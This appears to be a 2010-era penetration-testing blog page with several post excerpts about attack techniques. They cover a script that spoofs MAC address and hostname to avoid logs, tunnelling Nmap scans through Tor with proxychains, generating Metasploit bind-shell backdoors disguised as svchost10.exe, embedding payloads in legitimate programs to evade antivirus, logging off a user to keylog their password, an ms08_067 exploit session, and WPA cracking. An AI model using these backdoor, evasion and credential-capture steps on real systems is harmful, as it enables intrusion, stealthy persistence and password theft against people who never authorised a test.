When conducting a pentest, the first thing the pentester should do is to change its computer mac address and hostname because they are recorded in the logs and dhcp server. Macxchange is a very simple script. It is meant to work with backtrack or any other linux distro. It selects a random word from john the ripper wordlist for hostname, and for the mac address uses macchanger. Once your mac and hostname have been changed remember to restart networking or get an ip “dhclient <interface> “. So if you’re using other distro than backtrack, make sure to have macchanger installed, and edit the proper varialbe for wordlist. You can also download script from here
#!/bin/bash #author: Jorge L. Vazquez #purpose: this script will change the mac address to random #and will pick a random word from password.lst in jtr for hostname #change variables "interface" and "file" to your settings #also macchanger needs to be installed INTERFACE=eth0 FILE=/pentest/passwords/jtr/password.lst WORD=$(sort -R $FILE | head -1) #changing mac address to random ifconfig $INTERFACE down > /dev/null if [ $? == 0 ]; then printf "%s\nChanging mac address...\n" macchanger -r $INTERFACE else printf "%sScript encounter an error, sorry...\n" exit 1 fi #changing hostname to random word from password.lst printf "%s\nChanging Hostname...\n" OLDHOST=$(hostname) hostname $WORD if [ $? == 0 ]; then printf "%sPrevius Hostname: $OLDHOST \n" printf "%sRandom Hostname: $WORD \n" else printf "%sScript encounter an error, sorry...\n" exit 1 fi #putting interface up ifconfig $INTERFACE up > /dev/null printf "\n" #END
In order to achieve complete anonymity while scanning a host, proxychains is as good as it gets because it uses Tor and Privoxy to tunnel the Nmap scan. In other words, you feed an application to proxychains, in this case Nmap, and it uses Tor for the scan. ProxyChains allows you to use SSH, Telnet, VNC, FTP and other network application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers. Proxychains allows TCP and DNS tunneling through proxies. Be aware that Proxychains only tunnels TCP and DNS; in other words, avoid using UDP and host discovering through ICMP (ping). The options for these are “-n” telling nmap to not resolve hostname, and “-PN” telling nmap not to ping the host. Also, the Tor network is slow, so be patient! I’m doing this in Backtrack; therefore, I will not go over the installation of Nmap, Proxychains, and Tor because they are all there. But you may want to check the proxychains.conf file and make sure you have this settings.
[ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 127.0.0.1 9050
The “-sTV” options tells nmap to do a full TCP connect and Version Detection, “-PN” tells nmap not to ping the remote host, “-n” not to resolve any dns records, and finally, “-p” options for the ports.
root@bt:~# proxychains nmap -sTV -PN -n -p21,22,25,80 64.13.134.52 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-03 20:12 EDT |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:25-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:21-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK Nmap scan report for 64.13.134.52 Host is up (12s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 25/tcp closed smtp 80/tcp open http Apache httpd 2.2.3 ((CentOS)) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and with a few registry hacks the backdoor runs when the user login, allowing for shell access; however, there are a few drawbacks with this method. First, it requires to edit the registry and creating new keys (lengthy process). Second, upon the user login you can see netcat running for a split second and closing. It doesn’t take a savvy user to know something is up. And third, is an unauthenticated backdoor, which means is open for anyone. The two approaches I’m taking here are also unauthenticated which is not recommended, but sometimes that is the only choice, and what is more important, they are already built into metasploit.
The first method is the payload “shell_bind_tcp” which is the equibalent of netcat, but without having to do any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I’m assuming we got a meterpreter session going.
First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where you backdoor will be running waiting for connections. Read the rest of this entry »
One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, msfencode “-x” option allows you to select a profile, which could be a legit executable like: putty, calc, notepad, etc, to embed your payload, and; therefore, making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a “stager” rather than a full “payload”…. why? Well, a stager is a small piece of code that allocates in memory, open network port to communicate with the framework, and then it downloads the rest of the payload. A stager is very small. It’s because of its size that antivirus have a hard time detecting it. However, a full payload has everything needed to execute. So first we will create an executable using a single payload, and put it through AV scans.
NOTE: every time you see “>” inside the scripts, it’s “>”
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > svchost10.exe
Now, let’s put it through AV scans, and….
So you got a meterpreter session on a remote client, and now you want to get password hashes; but sometimes you can’t use “hashdump” from meterpreter, specially if your session is not running as user with admin privileges. So how could you get the remote user password? Well, Metasploit has a script called “keylogrecorder,” which has an option to logoff the user, and record his login password. Note that for this to work, you need to migrate your process to “winlogon.exe.”
STEPS:
1- Ok, the first thing is to get a meterpreter session going. For this we’ll use a “netapi” exploit.
msf > search netapi [*] Searching loaded modules for pattern 'netapi'... Exploits ======== Name Rank Description ---- ---- ----------- windows/smb/ms03_049_netapi good Microsoft Workstation Service NetAddAlternateComputerName Overflow windows/smb/ms06_040_netapi great Microsoft Server Service NetpwPathCanonicalize Overflow windows/smb/ms06_070_wkssvc normal Microsoft Workstation Service NetpManageIPCConnect Overflow windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption msf> use exploit/windows/smb/ms08_067_netapi
2- now we need to set the options for this exploit.
msf exploit(ms08_067_netapi)> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105 RHOST => 172.16.10.105
Ok, the previous video was kind of out dated, so I posted a new one. Credits to g0tmi1k. This video goes beyond just cracking wpa, it also shows how the different tools perform. This video explains the methodology really simple. Let me say that cracking WPA is not like cracking WEP, in WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability will be in the strength of the user passphrase. Yes you’ve guessed it, when cracking WPA basically what you’re doing is brute-forcing the user password, in other words the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size. How to find them?… Google is your friend! Read the rest of this entry »
If you’re like me that test pretty much any os and apps in some sort of virtual environment. In my case I use VMware Workstation, so when I decided to test Backtrack 4 final, I needed to install the vmware Tools, and here I go over the commands needed to install the vmware tools.
1- First go to VM->Install Vmware Tools (the figure shows as Reinstall VMware Tools because I had previously installed it) but yours should say “Install”
Subscribe
Designed By :
